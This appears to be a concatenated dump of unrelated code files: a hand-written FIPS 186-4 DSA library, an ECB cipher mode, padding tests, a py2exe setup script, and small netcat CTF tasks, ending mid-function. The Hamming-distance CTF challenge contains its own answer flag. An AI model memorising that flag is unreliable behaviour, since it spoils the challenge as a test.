CPIe = ((A * 2) + (B * 3) + (C * 6) + (D * 6))/qtd
print("O valor do CPIe eh: %0.4f" %CPIe)
ICoriginal = 100
CPIoriginal = 4.1
qtd = int(input("Insiraa a nova quantidade de instrucoes total: "))
speedUp = ((ICoriginal/qtd) * (CPIoriginal/CPIe) * (112/100))
print("O speedUp atual eh: %0.4f" %speedUp)
#==========================letra f========================================
elif escolha == "6":
print("6 ok")
``` |
{
"source": "0avasns/CheckVocal",
"score": 2
} |
#### File: 0avasns/CheckVocal/setup.py
```python
from distutils.core import setup
import py2exe
# We need to import the glob module to search for all files.
import glob
class Target:
def __init__(self, **kw):
self.__dict__.update(kw)
self.version = "3.0.2.0"
self.company_name = "<NAME>"
self.copyright = "(c) 2020 -- June 2nd"
self.name = "CheckVocal"
CV = Target(
description = "DMDX Vocal Response & RT Check Utility",
version = "3.0.2.0",
script = "CheckVocal.pyw",
icon_resources = [(1, "cv.ico")],
dest_base = "CheckVocal")
CF = Target(
description = "Audio File RT Check Utility",
version = "3.0.2.0",
script = "CheckVocal.pyw",
icon_resources = [(1, "cf.ico")],
dest_base = "CheckFiles")
AZT = Target(
description = "DMDX output converter: .azk to .txt format",
version = "1.3.0.0",
script = "azk2txt.pyw",
icon_resources = [(1, "a2t.ico")],
dest_base = "azk2txt")
setup(
options={ "py2exe":
{"packages": ["encodings"],
"compressed": 1,
"optimize": 2}
},
windows=[CF,CF,AZT,CV], # makes no sense but whatever is first does not get an icon on the exe, so I duplicated it ...
data_files=[
(r'tcl\snacklib', glob.glob(r'C:\Program Files (x86)\Python 2.7\tcl\snacklib\*')),
("icons",["cv.ico","cf.ico","a2t.ico"]),
(".",["README-CheckVocal.txt"])
],
)
``` |
{
"source": "0awawa0/aCrypt",
"score": 3
} |
#### File: ptCrypt/Asymmetric/DSA.py
```python
from ptCrypt.Math import base, primality
import hashlib
import secrets
from ptCrypt.Util.keys import FFC_APPROVED_LENGTHS
def generateProbablePrimes(N: int, L: int, seedLength: int, hashFunction: callable = hashlib.sha256, forceWeak: bool = False) -> tuple:
"""Generates probable primes p and q by algorithm from
FIPS 186-4, Appendix A.1.1.2
Parameters:
N: int
Bit length of q - smaller prime
L: int
Bit length of p - bigger prime
seedLength: int
Bit length of seed, must not be less than N
hashFunction: callable
Hash function conforming to hashlib protocols. By default hashlib.sha256 is used
Hash function output length must not be less than N.
By FIPS 186-4 one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if N and L should be verified to be approved by the standard. False by default.
Returns:
result: tuple
Tuple of generated parameters:
1. status: bool
True if generation was successful and False otherwise
2. p: int
Bigger prime
3. q: int
Smaller prime
4. domainParameterSeed: int
Seed for for primes verification
5. counter: int
Counter for primes verification
"""
# Steps 1 and 2
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak:
return (False, None, None, None, None)
    if seedLength < N:
        return (False, None, None, None, None)
# Setting count of Miller-Rabin tests to perform before single Lucas test
# according to Appendix C.3
if (N, L) == FFC_APPROVED_LENGTHS[0]:
pTests = 3
qTests = 19
elif (N, L) == FFC_APPROVED_LENGTHS[1]:
pTests = 3
qTests = 24
elif (N, L) == FFC_APPROVED_LENGTHS[2]:
pTests = 3
qTests = 27
else:
pTests = 2
qTests = 27
# Length of hash funciton output in bits
outlen = hashFunction().digest_size * 8
if outlen < N:
return (False, None, None, None, None)
# Steps 3 and 4
# n = ceil(L / outlen) - 1
if L % outlen == 0: n = L // outlen - 1
else: n = L // outlen
b = L - 1 - (n * outlen)
# Some precalculated powers of two, so we dont calculate it on each iteration
twoPowNMin1 = pow(2, N - 1) # 2^(N - 1)
twoPowSeedLength = pow(2, seedLength) # 2^seedlen
twoPowOutLength = pow(2, outlen) # 2^outlen
twoPowLMin1 = pow(2, L - 1) # 2^(L - 1)
twoPowB = pow(2, b) # 2^b
while 1:
while 1:
# Steps 5, 6, 7
domainParameterSeed = secrets.randbits(seedLength) | 2 ** (seedLength - 1)
# U = Hash(domain_parameter_seed) mod 2^(N - 1)
U = base.bytesToInt(hashFunction(base.intToBytes(domainParameterSeed)).digest()) % twoPowNMin1
# q = 2^(N - 1) + U + 1 - (U mod 2)
q = twoPowNMin1 + U + 1 - (U % 2)
# Step 8
if primality.millerRabin(q, qTests):
if primality.lucasTest(q): break
# Precalcualted value, to not calculate it in the loop
twoTimesQ = 2 * q
# Step 10
offset = 1
# Step 11
for counter in range(0, 4 * L):
# Steps 11.1 and 11.2
W = 0
for j in range(0, n):
# Vj = Hash((domain_parameter_seed + offset + j) mod 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + j) % twoPowSeedLength)
v = base.bytesToInt(hashFunction(hashPayload).digest())
# W = sum(Vj * 2^(j * outlen))
W += v * pow(twoPowOutLength, j)
# Last term of W calculation
# Vj = Hash((domain_parameter_seed + offset + j) % 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + n) % twoPowSeedLength)
v = int(base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowB)
# W += (Vn mod 2^b) * 2^(n * outlen)
W += v * pow(twoPowOutLength, n)
# Steps 11.3, 11.4 and 11.5
X = W + twoPowLMin1
c = X % twoTimesQ
p = X - (c - 1)
# Step 11.6
if p >= twoPowLMin1:
# Step 11.7
if primality.millerRabin(p, pTests):
if primality.lucasTest(p):
# Step 11.8
return (True, p, q, domainParameterSeed, counter)
# Step 11.9
offset = offset + n + 1
return (False, None, None, None, None)
def verifyProbablePrimesGenerationResult(p: int, q: int, domainParameterSeed: int, counter: int, hashFunction=hashlib.sha256, forceWeak: bool = False) -> bool:
"""Verifies if primes were generated by algorithm from
FIPS 186-4, Appendix A.1.1.2
Note that verification takes at least as much time as generation
Parameters:
p: int
Bigger prime
q: int
Smaller prime
seed: int
domainParameterSeed from generation function
counter: int
counter from generation function
hashFunction: callable
Hash function that conforms to hashlib protocols.
This function must be equal to the one used for primes generation
By default hashlib.sha256 is used.
By FIPS 186-4, one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if p and q should be verified to have approved lengths. False by default
Returns:
result: bool
True if verification succeeds
False if verification fails
"""
# Steps 1, 2
N = q.bit_length()
L = p.bit_length()
# Step 3
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return False
# Setting count of Miller-Rabin tests to perform before single Lucas test
# according to Appendix C.3
if (N, L) == FFC_APPROVED_LENGTHS[0]:
pTests = 3
qTests = 19
elif (N, L) == FFC_APPROVED_LENGTHS[1]:
pTests = 3
qTests = 24
elif (N, L) == FFC_APPROVED_LENGTHS[2]:
pTests = 3
qTests = 27
else:
pTests = 2
qTests = 27
# Step 4
if counter > (4 * L - 1): return False
# Steps 5, 6
seedLength = domainParameterSeed.bit_length()
if seedLength < N: return False
# Precomputed value 2^(N - 1)
twoPowNMin1 = pow(2, N - 1)
# Step 7
# U = Hash(domain_parameter_seed) mod 2^(N - 1)
hashPayload = base.intToBytes(domainParameterSeed)
U = base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowNMin1
# Step 8
# computed_q = 2^(n - 1) + U + 1 - (U mod 2)
computedQ = twoPowNMin1 + U + 1 - (U % 2)
if computedQ != q: return False
# Step 9
if not primality.millerRabin(computedQ, qTests): return False
if not primality.lucasTest(computedQ): return False
outlen = hashFunction().digest_size * 8
# Step 10
# n = ceil(L / outlen) - 1
if L % outlen == 0: n = L // outlen - 1
else: n = L // outlen
# Step 11
b = L - 1 - (n * outlen)
# Some precalculated powers of two
twoPowSeedLength = pow(2, seedLength) # 2^seedlen
twoPowOutLength = pow(2, outlen) # 2^outlen
twoPowLMin1 = pow(2, L - 1) # 2^(L - 1)
twoPowB = pow(2, b) # 2^b
twoTimesQ = 2 * q # 2 * q
# Step 12
offset = 1
# Step 13
for i in range(counter + 1):
# Steps 13.1, 13.2
W = 0
for j in range(0, n):
# Vj = Hash((domain_parameter_seed + offset + j) mod 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + j) % twoPowSeedLength)
v = base.bytesToInt(hashFunction(hashPayload).digest())
# W = sum(Vj * 2^(j * outlen))
W += v * pow(twoPowOutLength, j)
# Last term of W calculation
# Vj = Hash((domain_parameter_seed + offset + j) % 2^seedlen)
hashPayload = base.intToBytes((domainParameterSeed + offset + n) % twoPowSeedLength)
v = int(base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowB)
# W += Vn * 2^(outlen * n)
W += v * pow(twoPowOutLength, n)
# Steps 13.3, 13.4, 13.5
X = W + twoPowLMin1
c = X % twoTimesQ
computed_p = X - (c - 1)
# Step 13.6
if computed_p < twoPowLMin1:
offset = offset + n + 1
continue
# Step 13.7
if primality.millerRabin(computed_p, pTests):
if primality.lucasTest(computed_p):
# Steps 14 and 15
if i == counter and computed_p == p: return True
else: return False
# Step 13.9
offset = offset + n + 1
return False
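# --- Illustrative example (added for clarity, not part of the original module) ---
# Round trip of probable-prime generation and verification. The toy sizes below are
# NOT approved by FIPS 186-4 and are only used (with forceWeak=True) to keep the
# demonstration fast; real use should pick a pair from FFC_APPROVED_LENGTHS and
# drop forceWeak.
def _example_probable_primes():
    N, L = 64, 256  # toy, insecure sizes
    status, p, q, domainParameterSeed, counter = generateProbablePrimes(
        N, L, seedLength=N, forceWeak=True)
    if not status:
        print("generation failed, try again")
        return
    ok = verifyProbablePrimesGenerationResult(
        p, q, domainParameterSeed, counter, forceWeak=True)
    print(p.bit_length(), q.bit_length(), ok)  # 256 64 True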
def getFirstSeed(N: int, seedlen: int, forceWeak: bool = False):
"""Generates first seed for provable primes generation
Parameters:
N: int
Length of prime q in bits
seedlen: int
length of seed to return, must not be less than N
forceWeak: bool
Indicates if N should be checked to be approved. False by default.
Returns:
firstSeed: int
generated first seed or None if generation fails
"""
firstSeed = 0
if not forceWeak:
nIsCorrect = False
for lengths in FFC_APPROVED_LENGTHS:
nIsCorrect = nIsCorrect or (N in lengths)
else:
nIsCorrect = True
if not nIsCorrect: return None
if seedlen < N: return None
twoPowNMin1 = pow(2, N - 1)
while firstSeed < twoPowNMin1:
firstSeed = secrets.randbits(seedlen)
firstSeed |= (2 ** (seedlen - 1) + 1)
return firstSeed
def generateProvablePrimes(N: int, L: int, firstSeed: int, hashFunction: callable = hashlib.sha256, forceWeak: bool = False) -> tuple:
"""Generates provabele primes p and q by algorithm from
FIPS 186-4, Appendix A.1.2.1.2
Parameters:
N: int
Bit length of q - smaller prime
L: int
Bit length of p - bigger prime
firstSeed: int
the first seed to be used
hashFunction: callable
Hash function conforming to hashlib protocols.
Hash function output length must not be less than N
By FIPS 186-4 one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if N and L should be verified to be approved lengths. False by default.
Returns:
result: tuple
tuple of generation results:
1. status: bool
True if generation was successful and False otherwise
2. p: int
Bigger prime
3. q: int
Smaller prime
4. firstSeed: int
Same as the firstSeed parameter. Will be used for verifications
5. pSeed: int
pSeed for verification function
6. qSeed: int
qSeed for verification function
7. pGenCounter: int
pGenCounter for verification function
8. qGenCounter: int
qGenCounter for verification function
"""
# Step 1
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (False, None, None, None, None, None, None, None)
# Step 2
d = primality.shaweTaylor(N, firstSeed)
if not d["status"]: return (False, None, None, None, None, None, None, None)
q = d["prime"]
qSeed = d["primeSeed"]
qGenCounter = d["primeGenCounter"]
# Step 3
# p0Length = ceil(L / 2 + 1)
if L % 2 == 0: p0Length = L // 2 + 1
else: p0Length = L // 2 + 2
d = primality.shaweTaylor(p0Length, qSeed)
if not d["status"]: return (False, None, None, None, None, None, None, None)
p0 = d["prime"]
pSeed = d["primeSeed"]
pGenCounter = d["primeGenCounter"]
outlen = hashFunction().digest_size * 8
# Step 4, 5
if L % outlen == 0: iterations = L // outlen - 1
else: iterations = L // outlen
oldCounter = pGenCounter
twoPowOutlen = pow(2, outlen)
twoPowLMin1 = pow(2, L - 1)
# Steps 6, 7
x = 0
for i in range(iterations + 1):
hashPayload = base.intToBytes(pSeed + i)
h = base.bytesToInt(hashFunction(hashPayload).digest())
x = x + h * pow(twoPowOutlen, i)
# Steps 8, 9
pSeed = pSeed + iterations + 1
x = twoPowLMin1 + (x % twoPowLMin1)
# Step 10
# t = ceil(x / (2 * q * p0))
if x % (2 * q * p0) == 0: t = x // (2 * q * p0)
else: t = x // (2 * q * p0) + 1
while True:
# Step 11
if 2 * t * q * p0 + 1 > twoPowLMin1 * 2: t = twoPowLMin1 // (2 * q * p0) + (twoPowLMin1 % (2 * q * p0) != 0)
# Steps 12, 13
p = 2 * t * q * p0 + 1
pGenCounter += 1
# Steps 14, 15
a = 0
for i in range(iterations + 1):
hashPayload = base.intToBytes(pSeed + i)
h = base.bytesToInt(hashFunction(hashPayload).digest())
a = a + h * pow(twoPowOutlen, i)
# Steps 16, 17, 18
pSeed = pSeed + iterations + 1
a = 2 + (a % (p - 3))
z = pow(a, 2 * t * q, p)
# Step 19
if 1 == base.gcd(z - 1, p) and 1 == pow(z, p0, p):
return (True, p, q, firstSeed, pSeed, qSeed, pGenCounter, qGenCounter)
# Step 20
if pGenCounter > (4 * L + oldCounter): return (False, None, None, None, None, None, None, None)
# Step 21
t += 1
def verifyProvablePrimesGenerationResult(
p: int,
q: int,
firstSeed: int,
pSeed: int,
qSeed: int,
pGenCounter: int,
qGenCounter: int,
hashFunction: callable=hashlib.sha256,
forceWeak: bool = False
) -> bool:
"""Verifies if primes were generated by algorithm from
FIPS 186-4, Appendix 1.2.2
Note that verification takes at least as much time as generation
Parameters:
p: int
Bigger prime
q: int
Smaller prime
firstSeed: int
Seed that was passed to generation function
pSeed, qSeed, pGenCounter, qGenCounter: int
Parameters returned from generation function
hashFunction: callable
Hash function thath conforms to hashlib protocols.
This function must be equal to the one used for primes generation
By default hashlib.sha256 is used
By FIPS 186-4, one of APPROVED_HASHES should be used
forceWeak: bool
Indicates if length of p and length of q should be verified to have approved bit length. False by default
Returns:
result: bool
True if verification succeeds
False if verification fails
"""
L = p.bit_length()
N = q.bit_length()
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return False
if firstSeed < pow(2, N - 1): return False
if pow(2, N) <= q: return False
if pow(2, L) <= p: return False
if (p - 1) % q != 0: return False
check, checkP, checkQ, firstSeed, checkPSeed, checkQSeed, checkPGenCounter, checkQGenCounter = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak)
if checkP != p: return False
if checkQ != q: return False
if checkPSeed != pSeed: return False
if checkQSeed != qSeed: return False
if checkPGenCounter != pGenCounter: return False
if checkQGenCounter != qGenCounter: return False
return True
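# --- Illustrative example (added for clarity, not part of the original module) ---
# Round trip of provable-prime (Shawe-Taylor based) generation and verification.
# As above, the sizes are toy values used with forceWeak=True purely to keep the
# sketch quick; production code should use FFC_APPROVED_LENGTHS.
def _example_provable_primes():
    N, L = 64, 256  # toy, insecure sizes
    firstSeed = getFirstSeed(N, seedlen=N, forceWeak=True)
    result = generateProvablePrimes(N, L, firstSeed, forceWeak=True)
    while not result[0]:
        firstSeed = getFirstSeed(N, seedlen=N, forceWeak=True)
        result = generateProvablePrimes(N, L, firstSeed, forceWeak=True)
    _, p, q, firstSeed, pSeed, qSeed, pGenCounter, qGenCounter = result
    ok = verifyProvablePrimesGenerationResult(
        p, q, firstSeed, pSeed, qSeed, pGenCounter, qGenCounter, forceWeak=True)
    print(p.bit_length(), q.bit_length(), ok)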
def generateUnverifiableG(p: int, q: int, seed: int = 2, update: callable = lambda x: x + 1) -> tuple:
"""Generates g value for DSA according to algorithm from FIPS 186-4, Appendix A.2.1
Note, according to the standard argument seed must be unique for primes pair, but this function
will not guarantee this. It is a caller responsibility to provide seed and its update function.
Function will return seed along with g, so caller can mark it as used.
Parameters:
p: int
Bigger prime
q: int
Smaller prime
seed: int
initial value of h, see FIPS 186-4 for details
update: callable
seed update function if initial seed turned out to be inappropriate
Returns:
result: tuple
tuple of two values:
g: int
Generated primitive root
seed: int
Updated seed
"""
e = (p - 1) // q
while 1:
g = pow(seed, e, p)
if g != 1: break
seed = update(seed)
return (g, seed)
def partiallyVerifyRootGeneration(p: int, q: int, g: int) -> bool:
"""Checks partial validity of DSA parameters according to algorithm from FIPS 186-4, Appendix A.2.2
Note that this function verifies correctness, but not security. As standard states:
'The non-existence of a potentially exploitable relationship of g to another genrator g' (that is known to the entity
that generated g, but may not be know by other entities) cannot be checked'
Parameters:
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
Returns:
status: bool
True if parameters is partially valid.
False if parameters are definitely not valid
"""
if g < 2 or g > p - 1: return False
if pow(g, q, p) == 1: return True
return False
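# --- Illustrative example (added for clarity, not part of the original module) ---
# Given a (p, q) pair produced by one of the generation routines above, this sketch
# derives an unverifiable generator and checks it with the partial validation routine.
def _example_unverifiable_root(p, q):
    g, seed = generateUnverifiableG(p, q)
    print(partiallyVerifyRootGeneration(p, q, g))  # True for a correctly generated g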
def generateVerifiableG(p: int, q: int, domainParameterSeed: int, index: int, hashFunction: callable=hashlib.sha256) -> int:
"""Generates verifiable root for DSA. To generate more than one root for same primes, change index
Algorithm is specified by FIPS 186-4, Appendix A.2.3
Parameters:
p: int
Bigger prime
q: int
Smaller prime
domainParameterSeed: int
The seed returned by primes generation function.
When primes generated by algorithm from Appendix A.1.1.2 the domainParameterSeed value is used
When primes generated by algorithm from Appendix A.1.2.1 the domainParameterSeed is concatenated parameters firstSeed + pSeed + qSeed
index: int
Number of root to generate. For same p and q this function can generate different roots for different index values.
Index value must be bounded to 8 bit number
hashFunction: callable
hash function that conforms to hashlib protocols. By default hashlib.sha256 is used
Returns:
result: int
Generated primitive root. May be returned None if generate goes wrong.
"""
    if index.bit_length() > 8: return None
ggen = b"\x67\x67\x65\x6e"
indexBytes = base.intToBytes(index)
N = q.bit_length()
e = (p - 1) // q
count = 0
while True:
count = (count + 1) & 0xffff
if count == 0: return None
countBytes = base.intToBytes(count)
U = domainParameterSeed + ggen + indexBytes + countBytes
W = base.bytesToInt(hashFunction(U).digest())
g = pow(W, e, p)
if g >= 2:
return g
def verifyRootGeneration(
p: int,
q: int,
g: int,
domainParameterSeed: int,
index: int,
hashFunction: callable = hashlib.sha256
) -> bool:
"""Verifies that root were generated by algorithm from FIPS 186-4, Appendix A.2.4
Parameters:
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
domainParameterSeed: int
seed returned from primes generation function and used for root generation
index: int
Primitive root index. See generateVerifiableG for details
hashFunction: callable
hash function that conforms to hashlib protocols. Must be the same function that was used for root generation
By default hashlib.sha256 is used
Returns:
status: bool
True if root were generated by FIPS 186-4 method
False either if root is not correct at all, or if it is was not generated by FIPS 186-4
"""
if not partiallyVerifyRootGeneration(p, q, g): return False
ggen = b"\x67\x67\x65\x6e"
index = index & 0xff
indexBytes = base.intToBytes(index)
N = q.bit_length()
e = (p - 1) // q
count = 0
while True:
count = (count + 1) & 0xffff
if count == 0: return False
countBytes = base.intToBytes(count)
U = domainParameterSeed + ggen + indexBytes + countBytes
W = base.bytesToInt(hashFunction(U).digest())
computedG = pow(W, e, p)
        if computedG >= 2:
return computedG == g
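# --- Illustrative example (added for clarity, not part of the original module) ---
# Verifiable-root round trip: the same domainParameterSeed bytes and index used for
# generation must be supplied again for verification. Here domainParameterSeed is
# assumed to be the seed bytes produced while generating (p, q), in the same way
# generateParams below builds them.
def _example_verifiable_root(p, q, domainParameterSeed):
    index = 1
    g = generateVerifiableG(p, q, domainParameterSeed, index)
    if g is None:
        print("root generation failed for this index")
        return
    print(verifyRootGeneration(p, q, g, domainParameterSeed, index))  # True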
def generateParams(
N: int,
L: int,
provablePrimes: bool = False,
verifiableRoot: bool = False,
hashFunction: callable = hashlib.sha256,
forceWeak: bool = False
) -> tuple:
"""Generate random DSA parameters with minimal setup.
This function is not appropriate for systems with long lifecycle.
Parameters:
N: int
bit length of q - smaller prime
L: int
bit length of p - bigger prime
provablePrimes: bool
specifies if generated primes must be provably primes. This function will not return
any parameters for primes generation verification.
By default value is False.
verifiableRoot: bool
specifies if generated root must be generated by verifiable root generation algorithm.
This function will not return any parameters for root verification.
By default value is False
hashFunction: callable
hash function to use for primes and root generation. Must conform to hashlib protocols.
By default hashlib.sha256 is used
forceWeak: bool
Indicates if N and L should be verified to be approved by the standard.
Returns:
params: tuple
tuple that contains generated p, q, and g. Will return None if passed wrong parameters,
such as (N, L) pair not from APPROVED_LENGTHS or hash function digest size less than N
"""
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return None
outlen = hashFunction().digest_size * 8
if outlen < N: return None
if provablePrimes:
firstSeed = getFirstSeed(N, N,forceWeak)
result = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak)
while result[0] == False:
firstSeed = getFirstSeed(N, N, forceWeak)
result = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak)
else:
result = generateProbablePrimes(N, L, N, hashFunction, forceWeak)
p = result[1]
q = result[2]
domainParameterSeed = base.intToBytes(result[3])
if provablePrimes:
domainParameterSeed = domainParameterSeed + base.intToBytes(result[4]) + base.intToBytes(result[5])
if verifiableRoot:
index = 1
g = generateVerifiableG(p, q, domainParameterSeed, 1, hashFunction)
while g == None and index < 256:
index += 1
g = generateVerifiableG(p, q, domainParameterSeed, index, hashFunction)
if g == None: return None
else:
g = generateUnverifiableG(p, q)[0]
if g == None: return None
return (p, q, g)
def generateKeys(p: int, q: int, g: int, useAdditionalBits: bool = False, forceWeak: bool = False) -> tuple:
"""Generates public and private keys for DSA by algorithms specified
in FIPS 186-4, Appendix B.1.1 and B.1.2. This function implements both algorithms.
Set useAdditionalBits to True to use algorithm from B.1.1 and to False to use algorithm from B.1.2
Parameters:
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
useAdditionalBits: bool
Specifies the algorithm to use.
True - use FIPS 186-4, Appendix B.1.1
False - use FIPS 186-4, Appendix B.1.2
forceWeak: bool
Indicates if p and q should be verified to have approved lengths. False by default
Returns:
result: tuple
Pair of keys:
1. y: int
public exponent
2. x: int
private exponent
"""
N = q.bit_length()
L = p.bit_length()
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (None, None)
if useAdditionalBits:
c = secrets.randbits(N + 64)
x = (c % (q - 1)) + 1
else:
while True:
c = secrets.randbits(N)
if c <= q - 2: break
x = c + 1
y = pow(g, x, p)
return (y, x)
def generateSecret(p: int, q: int, useAdditionalBits: bool = False, forceWeak: bool = False) -> int:
"""Generates per-message random secret by algorithms specified in FIPS 186-4, Appendix B.2
Parameters:
p: int
Bigger prime
q: int
Smaller prime
useAdditionalBits: bool
Specifies algorithm to use
True - use FIPS 186-4, Appendix B.2.1
False - use FIPS 186-4, Appendix B.2.2
forceWeak: bool
Indicates if p and q should be verified to have approved length. False by default
Returns:
result: int
random number appropriate to use for DSA signing with given parameters.
May return None if inappropriate parameters were given
"""
N = q.bit_length()
L = p.bit_length()
if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return None
if useAdditionalBits:
c = secrets.randbits(N + 64)
k = (c % (q - 1)) + 1
try:
pow(k, -1, q)
except Exception:
return None
return k
else:
while True:
c = secrets.randbits(N)
if c <= q - 2: break
k = c + 1
try:
pow(k, -1, q)
except Exception:
return None
return k
def prepareMessage(
message: bytes,
q: int,
hashFunction: callable = hashlib.sha256
) -> int:
"""Processes the message before signing or verifying according to FIPS 186-4.
The procedure works as follows:
1) compute zLength = min(N, outlen),
where outlen is the length of hash function.
If hash function is not specified, then just take N
2) compute h = Hash(message) if a hash function is specified, or just the message itself otherwise
3) take zLength leftmost bits of h and return as an integer
So the value returned from this function can be directly inserted into signature/verification calculation
Parameters:
message: bytes
Message to process
q: int
Smaller prime
hashFunction: callable
hash function to use for message process. Must conform to hashlib protocols.
By default hashlib.sha256 is used. This value also might be None, then no hash function will be used
Returns:
result: int
Processed message as integer
"""
N = q.bit_length()
zLength = N
if hashFunction != None:
outlen = hashFunction().digest_size * 8
zLength = min(N, outlen)
message = hashFunction(message).digest()
message = base.bytesToInt(message)
if message.bit_length() > zLength:
message = message >> (message.bit_length() - zLength)
return message
def sign(
message: bytes,
p: int,
q: int,
g: int,
x: int,
secret: int,
hashFunction: callable = hashlib.sha256
) -> tuple:
"""Signs message with given private key and secret
Parameters:
message: bytes
Message to be signed
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
x: int
Secret exponent
secret: int
unique random secret for message signature
hashFunction: callable
hash function for signature. This function must conform to hashlib protocols.
By default hashlib.sha256 is used.
If this value is None, message bytes will be signed instead of its hash
Returns:
result: tuple
generated signature (r, s) for message
"""
message = prepareMessage(message, q, hashFunction)
r = pow(g, secret, p) % q
s = (pow(secret, -1, q) * (message + x * r)) % q
if r == 0 or s == 0: return None
return (r, s)
def verify(
message: bytes,
p: int,
q: int,
g: int,
r: int,
s: int,
y: int,
hashFunction: callable = hashlib.sha256
) -> bool:
"""Verifies given signature
Parameters:
message: bytes
Message which signature is to be checked
p: int
Bigger prime
q: int
Smaller prime
g: int
Primitive root
r, s: int
Signature to check
y: int
Public exponent
hashFunction: callable
signature's hash function. This function must conform to hashlib protocols.
By default hashlib.sha256 is used.
If this value is None, message bytes will be verified instead of its hash
Returns:
result: bool
True if signature is valid
False if signature is invalid
"""
if r <= 0 or r >= q: return False
if s <= 0 or s >= q: return False
message = prepareMessage(message, q, hashFunction)
w = pow(s, -1, q)
u1 = (message * w) % q
u2 = (r * w) % q
v = ((pow(g, u1, p) * pow(y, u2, p)) % p) % q
return v == r
```
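The helpers above compose into a straightforward sign/verify round trip. The sketch below is an illustration only: it assumes the functions are in scope (the import path is an assumption) and uses a deliberately tiny toy group with `forceWeak=True` so the approved-length check is skipped.
```python
# Minimal DSA round-trip sketch for the functions above (not a secure
# configuration): p = 23, q = 11, g = 2, where 2 has order 11 modulo 23.
import hashlib

p, q, g = 23, 11, 2

y, x = generateKeys(p, q, g, forceWeak=True)        # public / private key pair

signature = None
while signature is None:                            # sign() returns None when r or s is 0
    k = generateSecret(p, q, forceWeak=True)        # fresh per-message secret
    signature = sign(b"hello", p, q, g, x, k, hashlib.sha256)

r, s = signature
assert verify(b"hello", p, q, g, r, s, y, hashlib.sha256)
```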
#### File: Symmetric/Modes/ECB.py
```python
from ptCrypt.Symmetric.Modes.Mode import Mode
from ptCrypt.Symmetric.BlockCipher import BlockCipher
from ptCrypt.Symmetric.Paddings.Padding import Padding
class ECB(Mode):
"""Electronic codebook mode of encryption. The simplest encryption mode.
Encrypts every block independently from other blocks.
More: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
"""
def __init__(self, cipher: BlockCipher, padding: Padding = None):
super().__init__(cipher, padding)
def encrypt(self, data: bytes):
if self.padding:
data = self.padding.pad(data)
blocks = self.splitBlocks(data)
for i in range(len(blocks)):
blocks[i] = self.cipher.encrypt(blocks[i])
return self.joinBlocks(blocks)
def decrypt(self, data: bytes):
if len(data) % self.cipher.blockSize:
raise BlockCipher.WrongBlockSizeException(f"Cannot process data. Data size ({len(data)}) is not multiple of the cipher block size ({self.cipher.blockSize}).")
blocks = self.splitBlocks(data)
for i in range(len(blocks)):
blocks[i] = self.cipher.decrypt(blocks[i])
decrypted = self.joinBlocks(blocks)
if self.padding:
decrypted = self.padding.unpad(decrypted)
return decrypted
```
#### File: aCrypt/test/test_padding.py
```python
from ptCrypt.Math.base import pad
from ptCrypt.Symmetric.Paddings.ZeroPadding import ZeroPadding
from ptCrypt.Symmetric.Paddings.PKCS5Padding import PKCS5Padding
def testZeroPadding():
data = b"\x11\x12\x13"
padding = ZeroPadding(4)
assert padding.pad(data) == b"\x11\x12\x13\x00"
assert padding.unpad(padding.pad(data)) == data
def testPKCS5Padding():
data = b"\x11\x22\x33"
padding = PKCS5Padding(4)
assert padding.pad(data) == b"\x11\x22\x33\x01"
assert padding.unpad(padding.pad(data)) == data
data = b"\x11\x22\x33\x44"
padding = PKCS5Padding(4)
assert padding.pad(data) == b"\x11\x22\x33\x44\x04\x04\x04\x04"
assert padding.unpad(padding.pad(data)) == data
``` |
{
"source": "0awawa0/ctf-nc-framework",
"score": 2
} |
#### File: ctf-nc-framework/src/hello_world.py
```python
from lib.types import IStdin, IStdout
def hello(stdin: IStdin, stdout: IStdout):
stdout.write("Hello!\n")
``` |
{
"source": "0awawa0/DonNU_CTF",
"score": 4
} |
#### File: Coding/coding3/hamming_distance.py
```python
import random
from lib.types import IStdin, IStdout
def hamming_distance(a, b):
counter = 0
for i in str(bin(a ^ b)):
if i == '1': counter += 1
return counter
def main(stdin: IStdin, stdout: IStdout):
stdout.write("To get the flag you will need to calculate the Hamming distance of two numbers 100 times.\n")
stdout.write("Hamming distance is number of bits at which two numbers differ.\n")
stdout.write("Example: for 3 (011) and 5 (101) Hamming distance equals 2\n")
for i in range(100):
x, y = random.randint(1, 2 ** 32), random.randint(1, 2 ** 32)
stdout.write(f"Round {i + 1}: {x} {y}\n")
stdout.write("Answer >> ")
stdout.flush()
try:
answer = int(stdin.readline().strip())
if answer != hamming_distance(x, y):
stdout.write("Wrooong\n")
return None
except Exception:
stdout.write("You must answer with a single number\n")
return None
stdout.write("Congratulations! Your flag is donnuCTF{x0r_15_th3_answer}\n")
```
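A solver for this task only needs to parse the two numbers in each round and reply with the popcount of their XOR. A possible sketch using pwntools (host and port are placeholders):
```python
# Hypothetical solver for the task above; host/port are placeholders.
from pwn import remote  # assumes pwntools is installed

io = remote("tasks.example.org", 1337)
for _ in range(100):
    io.recvuntil(b"Round ")
    line = io.recvline().decode()                  # e.g. "1: 123 456"
    x, y = map(int, line.split(":")[1].split())
    io.sendlineafter(b"Answer >> ", str(bin(x ^ y).count("1")).encode())
print(io.recvall().decode())                       # should contain the flag
```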
#### File: Forensic/forensic4/script.py
```python
from PIL import Image
def toBin(arr):
res = ""
for b in arr:
